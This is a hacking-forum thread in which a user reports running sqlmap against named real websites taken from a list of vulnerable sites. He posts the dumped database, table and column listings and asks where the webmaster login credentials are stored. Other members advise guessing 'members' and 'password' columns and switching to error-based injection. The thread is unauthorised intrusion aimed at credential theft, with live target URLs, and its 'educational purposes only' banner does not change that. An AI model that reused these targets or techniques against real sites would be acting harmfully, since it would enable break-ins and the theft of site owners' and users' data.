Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Mysql - I find the tables but not the login details

  • 0 Vote(s) - 0 Average


10-25-2014, 06:37 AM #1
anthony Offline Junior Member **
Registered
Posts:5 Threads:1 Joined:Oct 2014 Reputation: 1
Mood: Excited
Hello, I found this sql vuln link http://www.oiwsba.com/oiwsba/memberinfo.php?id=59 from Sqli vulnerable sites 2014 thread.
I tray to find the login info with sqlmap, but I can not find anything useful.

I get 3 tables.

[*] athenapress_com_-_database
[*] information_schema
[*] test

I tray find login details from DB "athenapress_com_-_database" but the data wich I looking for is not in this tabess-columns.

This problem I get many times, I get the database, tables and columns, but login info is not in this columns. All this site have
database "information_schema", I also looking data in this database, but I can not find anything.

So where are the webmaster details, is may be hidden in the information_schema database? Can somebody tell me a little bit of this problem. Thanks

10-25-2014, 12:12 PM #2
planket Offline Member ***
Registered
Posts:208 Threads:101 Joined:Feb 2013 Reputation: 0
Mood: None
try using Table Name: members
ColumnName: username,password,email Biggrinsmiley

10-25-2014, 06:04 PM #3
anthony Offline Junior Member **
Registered
Posts:5 Threads:1 Joined:Oct 2014 Reputation: 1
Mood: Excited
Sorry I put the wrong link. The corect link is http://www.athenapress.com/book.php?ID=2693.

Database:

available databases [3]:
[*] athenapress_com_-_database
[*] information_schema
[*] test

Tables:

Database: athenapress_com_-_database
[3 tables]
+-----------------+
| book_categories |
| news |
| tblbooks |
+-----------------+

Columns for all the tables:

Database: athenapress_com_-_database
Table: book_categories
[2 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Category | varchar(255) |
| Display_As | varchar(255) |
+------------+--------------+

Database: athenapress_com_-_database
Table: news
[2 columns]
+--------+----------+
| Column | Type |
+--------+----------+
| body | longtext |
| id | int(11) |
+--------+----------+

Database: athenapress_com_-_database
Table: tblbooks
[12 columns]
+-------------+-----------------+
| Column | Type |
+-------------+-----------------+
| Author | varchar(255) |
| Categories | varchar(255) |
| Description | text |
| HTTPLink | text |
| ID | int(1) unsigned |
| ImageFileA | varchar(255) |
| ImageFileB | varchar(255) |
| ISBN | varchar(255) |
| ISBN_search | varchar(255) |
| Pages | int(1) unsigned |
| Price | varchar(255) |
| Title | varchar(255) |
+-------------+-----------------+

But how that you found the database from this site ---> http://www.oiwsba.com/oiwsba/memberinfo.php?id=59 ?
I tray with sqlmap but I get this error:

"" [09:36:50] [WARNING] GET parameter 'id' is not injectable
[09:36:50] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') ""

Thanks for you help

10-25-2014, 09:12 PM #4
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:790 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
it is error based because the normal injection dont display any usefull informations Smiley1
so use error based Smiley1
if you want you can look at my thread to that topic : http://www.madleets.com/Thread-Errorbase...-BYPASSING

[Image: xodhvlpa.jpg]
[Image: test.php]






Forum Jump:


Users browsing this thread:1 Guest(s)